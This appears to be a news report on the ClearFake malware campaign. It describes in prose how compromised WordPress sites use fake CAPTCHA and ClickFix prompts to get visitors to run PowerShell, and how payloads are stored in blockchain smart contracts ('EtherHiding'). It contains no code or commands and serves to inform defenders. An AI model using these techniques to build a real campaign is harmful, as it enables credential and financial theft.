Cybersecurity analysts have raised concerns over the latest ClearFake malware variant, which leverages Web3 capabilities to execute malicious operations using blockchain technology. Reports indicate that the malware utilizes smart contracts on the blockchain to store and deliver malicious scripts, resources, and payloads, complicating detection and mitigation efforts.
Tactics and Techniques Behind ClearFake
According to cybersecurity platform Sekoia.io, ClearFake primarily targets compromised WordPress websites to propagate its malware. The malware campaign employs a social engineering technique known as ClickFix, tricking users into executing malicious PowerShell scripts on their systems. Victims are typically shown a deceptive error message urging them to manually copy and run the malicious code via their Windows terminal.
Initially detected in July 2023, ClearFake previously lured users through fake web browser update pages. However, reports suggest that by May 2024, the threat actors shifted to using ClickFix. By mid-2024, approximately 200,000 unique users had accessed ClearFake-compromised websites, indicating the scale of the threat.
Use of Blockchain for Malware Distribution
The latest version of ClearFake, traced back to December 2024, has introduced new phishing tactics, including fake CAPTCHA pages and the integration of JavaScript frameworks. In a more alarming development, cybercriminals have been utilizing Binance Smart Chain (BSC) smart contracts to deliver various malware components, including ClickFix payloads.
Smart contracts, generally employed to facilitate blockchain transactions, are exploited in this case to store malicious files. Attackers embed files within the “Input Data” field of the smart contracts, which are then retrieved during the attack. This method ensures persistent storage of malicious payloads, immune to traditional takedown efforts.
When a user visits a compromised site, JavaScript embedded in the page loads specific Application Binary Interfaces (ABIs) to interact with Ethereum-based smart contracts. These ABIs contain functions and data structures that allow the malware to retrieve encrypted files, including malicious HTML and JavaScript payloads.
ClearFake’s malicious files are often hosted on Cloudflare Pages. The malware retrieves decryption keys from multiple Ethereum wallets, ensuring redundancy and making its takedown more challenging.
EtherHiding: Evasion Through Blockchain
The technique used by ClearFake to obscure malicious activities is referred to as EtherHiding. This approach allows cybercriminals to store malicious code on blockchain platforms like Ethereum and BSC. ClearFake previously applied EtherHiding on a smaller scale in October 2023, fetching a single malicious JavaScript file from its Ethereum address. The technique effectively bypasses traditional security measures, as blockchain-stored data remains immutable.
The continued use of EtherHiding by ClearFake highlights its adaptability and resilience. Security experts warn that this method makes it harder for cybersecurity teams to identify and eliminate the malware.
Social Engineering and Malware Deployment
The updated phishing tactics used by ClearFake involve fake CAPTCHA pages resembling Cloudflare Turnstile or Google reCAPTCHA. Victims attempting to pass these CAPTCHAs are shown deceptive error messages suggesting abnormal web traffic. They are then prompted to run PowerShell commands under the pretense of resolving the issue.
Upon execution, the malicious commands download and run additional payloads, including Emmental Loader and Lumma Stealer. In some cases, the Vidar Stealer malware is deployed using basic PowerShell loaders. These payloads are designed to extract sensitive information, including login credentials and financial data.
Scale of Impact and Detection Efforts
By tracking wallet addresses associated with the ClearFake campaign, Sekoia.io analysts conducted scans using Censys and identified over 9,300 compromised websites as of February 24, 2025. This substantial network of affected sites underlines the extensive reach of the malware campaign.
Cybersecurity experts have noted the advancements in ClearFake’s use of blockchain for malicious purposes. These recent developments, including the expanded implementation of EtherHiding, were previously documented by independent researcher Marek Szustak in January 2025.
Security professionals continue to recommend vigilance against such attacks, advising users to avoid executing unfamiliar commands and implement robust cybersecurity measures to mitigate risks.
